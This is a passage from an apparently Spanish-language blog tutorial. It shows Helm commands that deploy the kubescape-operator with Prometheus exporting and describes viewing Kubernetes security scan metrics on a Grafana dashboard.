--set prometheus.prometheusSpec.podMonitorSelectorNilUsesHelmValues=false,prometheus.prometheusSpec.serviceMonitorSelectorNilUsesHelmValues=false

Existe cantidad de tutoriales sobre como acceder a grafana, no voy a detenerme ahi. Aca te nuestro namespace de observabilidad que lo he llamado prometheus.

Ahora vamos a desplegar nuestro kubescape-operator sobre el namespace kubescape.

helm upgrade kubescape kubescape/kubescape-operator -n kubescape --install --set capabilities.prometheusExporter=enable --set configurations.prometheusAnnotations=enable

Uala!

Utilización en Grafana

Vamos a ingresar a grafana, para comenzar con nuestras búsquedas.

Ya empezamos a ver las métricas del escaneo continuo. Ahora tenemos un potente dashboard, para ir llenando nuestro backlog de trabajo. Les voy a compartir un Dashboard que hizo la comunidad, para ir jugando. Simplemente deben importar este código. Se ve algo asi.

No hace falta que comente la potencia de la herramienta y la sencillez que nos regala a la hora de poder ser asertivos a la hora de resolver inconvenientes de nuestra infraestructura Kubernetes. Espero que les sirve.